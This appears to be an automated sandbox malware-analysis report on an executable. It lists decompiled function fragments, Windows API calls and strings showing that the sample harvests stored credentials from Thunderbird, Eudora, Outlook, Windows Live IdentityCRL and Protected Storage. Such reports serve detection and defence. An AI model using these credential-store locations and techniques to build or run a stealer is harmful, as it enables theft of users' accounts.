Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF

Uniqueness

Uniqueness Score: -1.00%

Function 00411F43, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7

Strings

ntdll.dll, xrefs: 00411F4E

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: ntdll.dll
API String ID: 2574300362-2227199552
Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776

Uniqueness

Uniqueness Score: -1.00%

Function 0040923A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040923A(void** __esi, struct HWND__* _a4) {
				long _v8;
				signed int _v20;
				signed int _v24;
				short _v28;
				void* _v36;
				void* _t17;
				long _t22;
				short* _t25;
				int _t27;
				void** _t28;

				_t28 = __esi;
				_t27 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v24 = _v24 & 0x00000000;
							_v20 = _v20 & 0x00000000;
							_t25 =  *_t28 + _t27 * 4;
							_v36 = 0x22;
							_t22 = SendMessageA(_a4, 0x1019, _t27,  &_v36);
							if(_t22 != 0) {
								 *_t25 = _v28;
								_t22 = _v8;
								 *(_t25 + 2) = _t22;
							}
							_t27 = _t27 + 1;
						} while (_t27 < _t28[1]);
						return _t22;
					}
				}
				return _t17;
			}

0x0040923a
0x00409241
0x00409246
0x00409252
0x0040925d
0x00409260
0x00409262
0x00409266
0x0040926a
0x0040927a
0x00409281
0x00409289
0x0040928f
0x00409292
0x00409296
0x00409296
0x0040929a
0x0040929b
0x00000000
0x004092a0
0x0040925d
0x004092a3

APIs

memset.MSVCRT ref: 00409252
SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281

Strings

", xrefs: 0040927A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSendmemset
String ID: "
API String ID: 568519121-123907689
Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C3AF(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t21;

				_t15 =  *0x41dbd4; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E00402CAC;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t21 = CreateWindowExA(0, 0x415454, 0x415454, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x41dbd4, __esi);
				 *(__esi + 0x108) = _t21;
				return _t21;
			}

0x0040c3b5
0x0040c3ba
0x0040c3c3
0x0040c3cc
0x0040c3d3
0x0040c3d6
0x0040c3dd
0x0040c3e0
0x0040c3e3
0x0040c3e6
0x0040c3ed
0x0040c3f0
0x0040c418
0x0040c41e
0x0040c426

APIs

RegisterClassA.USER32(?), ref: 0040C3F0
CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418

Strings

MessenPass, xrefs: 0040C3FD, 0040C415, 0040C416

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ClassCreateRegisterWindow
String ID: MessenPass
API String ID: 3469048531-1347981195
Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00408A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000), ref: 00408A31
sprintf.MSVCRT ref: 00408A54

Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4

Strings

menu_%d, xrefs: 00408A4A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
String ID: menu_%d
API String ID: 1129539653-2417748251
Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC

Uniqueness

Uniqueness Score: -1.00%

Function 00409141, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00409141(char* __esi) {
				char* _t2;
				char* _t5;

				_t5 = __esi;
				E004069E8(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				0x413cf4(_t5, "_lng.ini");
				return _t2;
			}

0x00409141
0x00409142
0x0040914a
0x00409154
0x00409156
0x00409156
0x0040915f
0x00409166

APIs

Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3

strrchr.MSVCRT ref: 0040914A
_mbscat.MSVCRT ref: 0040915F

Strings

_lng.ini, xrefs: 00409159

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FileModuleName_mbscatstrrchr
String ID: _lng.ini
API String ID: 3334749609-1948609170
Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE

Uniqueness

Uniqueness Score: -1.00%

Function 00406DA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406DA8(struct HWND__* _a4) {
				signed int _t5;

				_t5 = SetWindowLongA(_a4, 0xffffffec, GetWindowLongA(_a4, 0xffffffec) | 0x00400000);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00406dc0
0x00406dc8
0x00406dcc

APIs

GetWindowLongA.USER32(?,000000EC), ref: 00406DAE
SetWindowLongA.USER32(000000EC,000000EC,00000000), ref: 00406DC0

Strings

MZ@, xrefs: 00406DB4

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: LongWindow
String ID: MZ@
API String ID: 1378638983-2978689999
Opcode ID: d2a461ae841fa0dde44b9faf912a436fc80ff43710132b853de9347092c42cfe
Instruction ID: afbc625c57fd7c5c64aba701cafa3846435a0d62a4f17ca64e8d7e2a082489bd
Opcode Fuzzy Hash: d2a461ae841fa0dde44b9faf912a436fc80ff43710132b853de9347092c42cfe
Instruction Fuzzy Hash: ADC002711AC516ABDF112B64EC49EAB7EA9ABC1322F208B74B066E50F1CB318450DA59

Uniqueness

Uniqueness Score: -1.00%

Function 00407E33, Relevance: 5.1, APIs: 4, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00407E33(intOrPtr* _a4, intOrPtr _a8, char* _a12) {
				int _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				signed int* _v40;
				char _v44;
				void _v304;
				char _v560;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				signed int _t44;
				signed int* _t64;
				char _t72;
				signed int _t77;
				char* _t78;
				void* _t81;
				void* _t82;
				int _t84;
				char* _t86;
				void* _t88;
				signed int _t93;

				_t39 = strlen(_a12);
				_t77 = _t39;
				_t40 = _t39 & 0x80000001;
				if(_t40 < 0) {
					_t40 = (_t40 - 0x00000001 | 0xfffffffe) + 1;
					_t93 = _t40;
				}
				if(_t93 != 0 || _t77 <= 0x20) {
					return _t40;
				} else {
					_t82 = 0;
					_v2608 = 0;
					memset( &_v2607, 0, 0x7ff);
					_t64 = _a4 + 4;
					_t44 =  *_t64 | 0x00000001;
					_v12 = 0;
					if(_t77 <= 4) {
						L8:
						_v28 = _t82;
						_v20 = _t82;
						_v24 = _t82;
						if(E00404C9D( &_v28, 0) != 0) {
							_v36 = _v12;
							_v32 =  &_v2608;
							_v44 = 0x10;
							_v40 = _t64;
							if(E00404CF5( &_v28,  &_v36,  &_v44,  &_v16) != 0) {
								_t84 = _v16;
								if(_t84 > 0xff) {
									_t84 = 0xff;
								}
								_v560 = 0;
								_v304 = 0;
								memcpy( &_v304, _v12, _t84);
								_t78 =  &_v560;
								 *((char*)(_t88 + _t84 - 0x12c)) = 0;
								E00406958(0xff, _t78, _a8);
								 *((intOrPtr*)( *_a4))(_t78);
								LocalFree(_v12);
							}
						}
						return E00404CE0( &_v28);
					}
					_t86 =  &(_a12[5]);
					_t81 = (_t77 + 0xfffffffb >> 1) + 1;
					do {
						_t72 = ( *((intOrPtr*)(_t86 - 1)) - 0x00000001 << 0x00000004 |  *_t86 - 0x00000021) - _t44;
						_t44 = _t44 * 0x10ff5;
						_t86 =  &(_t86[2]);
						_v12 = _v12 + 1;
						_t81 = _t81 - 1;
						 *((char*)(_t88 + _v12 - 0xa2c)) = _t72;
					} while (_t81 != 0);
					_t82 = 0;
					goto L8;
				}
			}

0x00407e42
0x00407e47
0x00407e49
0x00407e4f
0x00407e55
0x00407e55
0x00407e55
0x00407e56
0x00407f7b
0x00407e65
0x00407e6a
0x00407e74
0x00407e7b
0x00407e83
0x00407e8b
0x00407e91
0x00407e94
0x00407ecd
0x00407ed0
0x00407ed3
0x00407ed6
0x00407ee0
0x00407ee9
0x00407ef2
0x00407f04
0x00407f0b
0x00407f15
0x00407f17
0x00407f21
0x00407f23
0x00407f23
0x00407f30
0x00407f37
0x00407f3e
0x00407f46
0x00407f4c
0x00407f54
0x00407f64
0x00407f69
0x00407f69
0x00407f15
0x00000000
0x00407f72
0x00407e9e
0x00407ea1
0x00407ea2
0x00407eb4
0x00407eb6
0x00407ebd
0x00407ebe
0x00407ec1
0x00407ec2
0x00407ec2
0x00407ecb
0x00000000
0x00407ecb

APIs

strlen.MSVCRT ref: 00407E42
memset.MSVCRT ref: 00407E7B
memcpy.MSVCRT ref: 00407F3E
LocalFree.KERNEL32(?,?,?,?,?), ref: 00407F69

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FreeLocalmemcpymemsetstrlen
String ID:
API String ID: 3110682361-0
Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004092CC, Relevance: 5.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00406D91: memset.MSVCRT ref: 00406D9F

??2@YAPAXI@Z.MSVCRT ref: 004092E1
??2@YAPAXI@Z.MSVCRT ref: 0040930A
??2@YAPAXI@Z.MSVCRT ref: 0040932B
??2@YAPAXI@Z.MSVCRT ref: 0040934C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
Opcode Fuzzy Hash: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: g4FtSOZMD9.exe PID: 5972 Parent PID: 5452 g4FtSOZMD9.exeCOMMON

Executed Functions

Function 00407C87, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
strlen.MSVCRT ref: 00407CEB
strlen.MSVCRT ref: 00407CF3

Strings

.8D, xrefs: 00407CD6

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FileFindstrlen$FirstNext
String ID: .8D
API String ID: 379999529-2881260426
Opcode ID: 2f23431672a170874dff748454bcf8ed33e684267fdc211879dee5067ff0ed53
Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
Opcode Fuzzy Hash: 2f23431672a170874dff748454bcf8ed33e684267fdc211879dee5067ff0ed53
Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729

Uniqueness

Uniqueness Score: -1.00%

Function 00401E60, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401E82
strlen.MSVCRT ref: 00401E9B
strlen.MSVCRT ref: 00401EA9
strlen.MSVCRT ref: 00401EEF
strlen.MSVCRT ref: 00401EFD
memset.MSVCRT ref: 00401FA8
atoi.MSVCRT ref: 00401FD7
memset.MSVCRT ref: 00401FFA
sprintf.MSVCRT ref: 00402027

Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC

memset.MSVCRT ref: 0040207D
memset.MSVCRT ref: 00402092
strlen.MSVCRT ref: 00402098
strlen.MSVCRT ref: 004020A6
strlen.MSVCRT ref: 004020D9
strlen.MSVCRT ref: 004020E7
memset.MSVCRT ref: 0040200F

Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98

_mbscpy.MSVCRT ref: 0040216E
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402178
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402193

Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,004093E6,?,0040949C,00000000,?,00000000,00000104,?), ref: 00406D23

Strings

nss3.dll, xrefs: 004020D4, 004020FC
Mozilla\Profiles, xrefs: 00401E95, 00401E9A, 00401EC2
current, xrefs: 00401F36
Software\Qualcomm\Eudora\CommandLine, xrefs: 00401F3B
Software\Mozilla\Mozilla Thunderbird, xrefs: 00401F7D
%programfiles%\Mozilla Thunderbird, xrefs: 0040218E
Install Directory, xrefs: 00402034
sqlite3.dll, xrefs: 00401FCB, 00402097, 004020BC
%s\Main, xrefs: 00402021
Thunderbird\Profiles, xrefs: 00401EE4, 00401F12
Software\Classes\Software\Qualcomm\Eudora\CommandLine\current, xrefs: 00401F61

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
API String ID: 1846531875-4223776976
Opcode ID: 2efd86300e024d6efc85e43d3be0f7cfad0c6c216968d69824029d12e6def614
Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
Opcode Fuzzy Hash: 2efd86300e024d6efc85e43d3be0f7cfad0c6c216968d69824029d12e6def614
Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC66, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll,74784DE0,?,00000000,?,?,?,0040CC82,74784DE0), ref: 00404AB3
Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CC82,74784DE0), ref: 00404AD9
Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04

??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
DeleteObject.GDI32(?), ref: 0040CEC8

Strings

/savelangfile, xrefs: 0040CCD8
Error, xrefs: 0040CD53
Failed to load the executable file !, xrefs: 0040CD58
, xrefs: 0040CCA0
/deleteregkey, xrefs: 0040CD06

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
API String ID: 745651260-375988210
Opcode ID: d159c141ab375b31669b0f8ca971d6aceb4ec9b184042863a5891b2f64bfe083
Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
Opcode Fuzzy Hash: d159c141ab375b31669b0f8ca971d6aceb4ec9b184042863a5891b2f64bfe083
Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408043, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004080A5
memset.MSVCRT ref: 004080B9
memset.MSVCRT ref: 004080D3
memset.MSVCRT ref: 004080E8
GetComputerNameA.KERNEL32(?,?), ref: 0040810A
GetUserNameA.ADVAPI32(?,?), ref: 0040811E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
strlen.MSVCRT ref: 0040815B
strlen.MSVCRT ref: 0040816A
memcpy.MSVCRT ref: 0040817C

Strings

5, xrefs: 00408087
}, xrefs: 00408097
}, xrefs: 0040808B
O, xrefs: 0040808F
H, xrefs: 0040809B
b, xrefs: 00408073
i, xrefs: 0040806B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
String ID: 5$H$O$b$i$}$}
API String ID: 1832431107-3760989150
Opcode ID: 282d28ced94b0fcaa9e4670a9559102abf7cd8878a85da3a2d842f9bb15e03e3
Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
Opcode Fuzzy Hash: 282d28ced94b0fcaa9e4670a9559102abf7cd8878a85da3a2d842f9bb15e03e3
Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,0041019A,?,?,?,?,?,?,004041AC), ref: 00410172

LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
_mbscpy.MSVCRT ref: 00403E41

Strings

Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
pstorec.dll, xrefs: 00403C1D
PStoreCreateInstance, xrefs: 00403C31
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
www.google.com/Please log in to your Gmail account, xrefs: 00403C73
www.google.com/Please log in to your Google Account, xrefs: 00403C87
Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc_mbscpy
String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
API String ID: 1197458902-317895162
Opcode ID: 16d710c2c8ef2909cf8acda35180550ae954c7b9d514cc6f7f92b078fa630212
Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
Opcode Fuzzy Hash: 16d710c2c8ef2909cf8acda35180550ae954c7b9d514cc6f7f92b078fa630212
Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00444ADF, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,004454B0,00000070), ref: 00444143
__set_app_type.MSVCRT ref: 0044419C
__p__fmode.MSVCRT ref: 004441B1
__p__commode.MSVCRT ref: 004441BF
__setusermatherr.MSVCRT ref: 004441EB
_initterm.MSVCRT ref: 00444201
__getmainargs.MSVCRT ref: 00444224
_initterm.MSVCRT ref: 00444237
GetStartupInfoA.KERNEL32(?), ref: 00444276
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0044429A
exit.KERNELBASE ref: 004442AD
_cexit.MSVCRT ref: 004442B3

Strings

hlTD, xrefs: 00444232

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID: hlTD
API String ID: 3662548030-830287725
Opcode ID: d03d879d5947e69966ea52de6d40127aa3f3a56226b2b89a45c188bb43393423
Instruction ID: 40ad7b0c00f2311c165bc909df396f0d9a91af47b9cdc4b75167da6d31c8b263
Opcode Fuzzy Hash: d03d879d5947e69966ea52de6d40127aa3f3a56226b2b89a45c188bb43393423
Instruction Fuzzy Hash: E541A374D00B149FEB209FA4DC497AE7B74BB85756B20016BF851A72A3C7B88C81CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F478, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F

Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F

memcpy.MSVCRT ref: 0040F55C
memcpy.MSVCRT ref: 0040F571

Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4

LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9

